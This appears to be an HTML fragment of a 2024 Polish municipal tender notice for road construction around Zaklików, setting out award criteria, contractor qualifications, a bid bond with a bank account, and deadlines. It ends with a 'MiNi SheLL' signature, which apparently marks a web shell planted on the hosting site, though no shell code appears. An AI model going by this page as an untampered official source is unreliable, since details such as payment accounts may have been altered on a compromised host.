<h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">34922100-7 - Oznakowanie drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zrównanie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu rękojmi na wykonane roboty budowlane oraz dostarczone i wbudowane materiały</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">33,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: postępowaniu<br/>1.1.	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>1.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>1.3.	sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie1.4	zdolności technicznej lub zawodowej w zakresie:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>1)	Wykonawca winien wykazać, że wykonał należycie nie wcześniej <br/>niż w okresie ostatnich 5 lat przed upływem terminu składania <br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: <br/>a)	w zakresie części 1 zamówienia:<br/>co najmniej dwa zamówienia, z których każde:<br/>- polegało na budowie lub przebudowie drogi publicznej lub wewnętrznej i obejmowało swoim zakresem wykonanie nawierzchni drogi z masy mineralno – asfaltowej (betonu asfaltowego), budowę (rozbudowę) oświetlenia ulicznego, wykonanie elementów odwodnienia (studnie rewizyjne, kanały z rur strukturalnych) oraz elementy (ciągi piesze, zatoki, place) z kostki brukowej betonowej<br/>- miało wartość nie mniejszą niż 500 000,00 zł brutto <br/>Z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone;<br/>b)	w zakresie części 2 zamówienia:<br/>co najmniej dwa zamówienia, z których każde:<br/>- polegało na budowie1 lub przebudowie2 drogi publicznej lub wewnętrznej i obejmowało swoim zakresem wykonanie nawierzchni drogi z masy mineralno – asfaltowej (betonu asfaltowego) z elementami odwodnienia (studnie rewizyjne, kanały z rur strukturalnych oraz elementy (ciągi piesze, zatoki, place) z kostki brukowej betonowej <br/>- miało wartość nie mniejszą niż 500 000,00 zł brutto każda<br/>Z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone;<br/>2)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia <br/>i skierują do jego realizacji: <br/>a)	w zakresie części 1 zamówienia:<br/>	min. jedną osobą (która będzie pełnić funkcję Kierownika budowy) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogo-wej lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych, legity-mującą się minimum 3 letnim doświadczeniem zawodowym (3 lata od daty otrzymania uprawnień o wymaganej specjalności) i posiada-jącą doświadczenie w kierowaniu co najmniej 2 robotami budowla-nymi związanymi z budową lub przebudową dróg publicznych <br/>	min. jedną osobą (która będzie pełnić funkcję Kierownika robót elektrycznych) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych, posiadającą doświadczenie w kierowaniu co najmniej 2 robotami budowlanymi związanymi z budową lub rozbudową linii oświetlenia ulicznego <br/>b)	w zakresie części 2 zamówienia:<br/>	min. jedną osobą (która będzie pełnić funkcję Kierownika budowy) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych, legitymującą się minimum 3 letnim doświadczeniem zawodowym (3 lata od daty otrzymania uprawnień o wymaganej specjalności) i posiadającą doświadczenie w kierowaniu co najmniej 2 robotami budowlanymi związanymi z budową lub przebudową dróg publicznych <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu:<br/>a)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689, ze zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, zgodnie z Załącznikiem Nr 10 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne odpowiednie dokumenty – w odniesieniu do warunku określonego odpowiednio w pkt. 6.1.4. ppkt. 1) lit a) lub lit b) SWZ,<br/>b)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z Załącznikiem Nr 8 do SWZ – w odniesieniu do warunku określonego odpowiednio w pkt. 6.1.4. ppkt. 2) lit a) lub lit b) SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany wnieść wadium w wysokości:<br/>1.1.	w zakresie części 1 zamówienia: 25 000,00 PLN(słownie: dwadzieścia pięć tysięcy złotych).<br/>1.2.	w zakresie części 2 zamówienia: 25 000,00 PLN(słownie: dwadzieścia pięć tysięcy złotych).<br/>2.	Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:<br/>BSZK w Kraśniku o/Zaklików <br/>numer konta:07 8717 1093 2012 1200 0101 0006<br/>z adnotacją „Wadium – Znak sprawy: IN.271.14.2024 - część ...” - z dopisaniem części, której wadium dotyczy .<br/>4.	Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania ofert.<br/>6.	W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a)	nazwę: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b)	kwotę wadium,<br/>c)	termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”,<br/>d)	zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w gwarancji/poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy.<br/>e)	sądem właściwym do rozpatrywania ewentualnych sporów związanych z wadium jest sąd właściwy dla siedziby Zamawiającego.<br/>7.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>8.	Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b)	w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno potwierdzać ten fakt. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ. <br/>c)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.4 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.4.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.<br/>Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do<br/>umowy, pod rygorem nieważności takiej zmiany na podstawie okoliczności, o których mowa w art. 455 ustawy Pzp.<br/>2. Zamawiający przewiduje dodatkowo następujące okoliczności umożliwiające dokonanie zmian, o których mowa w art.<br/>455 ust. 1 pkt 1 ustawy Pzp, z uwzględnieniem warunków ich wprowadzenia:<br/>1) Zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy, w tym prawa miejscowego – zmiana umowy w<br/>zakresie wprowadzenia skutków zmian przepisów.<br/>2) Z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego<br/>nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub<br/>grożącego powstaniem szkody w znacznych rozmiarach – zmiana umowy w zakresie wprowadzenia skutków danego<br/>zdarzenia losowego.<br/>3) W przypadku zaistnienia sytuacji pozwalającej na obniżenie kosztów realizacji inwestycji, obniżenie kosztów utrzymania<br/>lub poprawę warunków użytkowania przedmiotu umowy (np. zastosowanie alternatywnych rozwiązań technologicznych lub<br/>materiałowych niewpływające negatywnie na realizację zamierzonego celu) – zmiana umowy w zakresie zastosowanych<br/>rozwiązań projektowych (materiałów, technologii wykonania) zaakceptowanych przez projektanta oraz inspektora nadzoru<br/>inwestorskiego wraz ze związaną z tym zmianą wynagrodzenia przysługującego Wykonawcy o kwotę nieprzekraczającą 5%<br/>wartości umowy;<br/>4) W przypadku ograniczenia zakresu przedmiotu umowy, ale nie więcej niż o 10%, wynagrodzenia przysługującego<br/>Wykonawcy, w przypadku, gdy w trakcie realizacji robót zostanie ujawniona sytuacja umożliwiająca rezygnację z części<br/>robót objętych przedmiotem umowy, które nie są niezbędne do prawidłowej realizacji i funkcjonowania przedmiotu umowy, co zostanie potwierdzone przez projektanta oraz Inspektora nadzoru. W takim przypadku wynagrodzenie Wykonawcy<br/>zostanie odpowiednio pomniejszone, na podstawie cen jednostkowych i czynników kalkulacyjnych określonych w<br/>kosztorysie ofertowym Wykonawcy.<br/>3. Strony w czasie realizacji niniejszej umowy dopuszczają możliwość zmiany wysokości maksymalnego wynagrodzenia<br/>należnego Wykonawcy po uprzednim zawarciu pisemnego aneksu w przypadku:<br/>1) ustawowej zmiany stawki podatku od towarów i usług VAT odnoszącej się do przedmiotu umowy, które nastąpiły pod<br/>dniu wejścia w życie przepisów dokonujących zmiany stawki podatku VAT;<br/>2) zmian zakresu wykonywanych robót wprowadzonych przez Zamawiającego (roboty dodatkowe, zamienne lub<br/>uzupełniające);<br/>3) zaistnienia sytuacji, o której mowa w § 8 ust. 1 pkt p) umowy<br/>4. Zmiana wynagrodzenia Wykonawcy wchodzi w życie z dniem zawarcia pisemnego aneksu do umowy, nastąpi od daty<br/>wprowadzenia zmiany w umowie i dotyczy wyłącznie niezrealizowanej części umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zaklikow.ezamawiajacy.pl/pn/zaklikow/demand/notice/publicpzp/current/list?USER_MENU_HOVER=publicpzpCurrentNoticePublicList</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-30 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający informuje, iż zamówienie jest dofinansowane ze środków Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych, Nr EdycjaEdycja8/2023/4407/PolskiLad.<br/>2.	Zamawiający na podstawie art. 310 ustawy Pzp wskazuje, że może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia w ramach ww. źródła finansowania, nie zostały mu przyznane. <br/>3.	Opis inwestycji wynikający z wniosku o dofinansowanie.<br/>W ramach projektu zostaną wybudowane i przebudowane drogi w miejscowościach: Zaklików, Lipa i Łysaków Kolonia o łącznej długości ok. 2, 6 km o nawierzchni z masy mineralno - asfaltowej lub kostki brukowej na podbudowie z kruszyw drogowych wraz z elementami odwodnienia, utwardzeniem poboczy, oznakowaniem i pozostałymi robotami towarzyszącymi koniecznymi do zrealizowania w celu uzyskania efektu osiągnięcia kompleksowego efektu związanego z poprawą stanu technicznego i bezpieczeństwa ruchu drogowego na założonych do realizacji odcinkach dróg. Realizacja projektu przyczyni się do lepszego skomunikowania miejscowości, podniesie poziom życia mieszkańców oraz spowoduje poprawę atrakcyjności miejscowości.<br/>Zamawiający dopuszcza możliwość składania ofert częściowych - ofertę można złożyć na jedną lub dwie części stanowiące przedmiot zmówienia.<br/>Zamawiający nie dopuszcza składania ofert wariantowych.<br/>Zamawiający nie przewiduje wymagań wskazanych w art. 96 ust. 2 pkt 2 ustawy Pzp.<br/>Zamawiający nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp.<br/>Zamawiający nie wymaga przeprowadzenia przez Wykonawcę wizji lokalnej lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 ust. 2 ustawy Pzp, jednakże z uwagi na fakt, iż przedmiot zamówienia dotyczy realizacji robót na działkach o zróżnicowanej formie zagospodarowania zaleca się dokonanie wizji lokalnej celem zapoznania się z istniejącym stanem zagospodarowania terenu, stanem technicznym istniejących obiektów oraz istniejącymi nasadzeniami drzew. Teren jest ogólnodostępny i możliwy do samodzielnego dokonania wizji lokalnej.<br/>Zamawiający nie przewiduje rozliczenia między Zamawiającym a Wykonawcą w walutach obcych.<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>Zamawiający nie wymaga obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań zgodnie z art. 60 i art. 121 ustawy Pzp.<br/>Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej wraz z informacjami, o których mowa w art. 230 ustawy Pzp.<br/>Zamawiający nie stawia wymogu lub możliwości złożenia ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com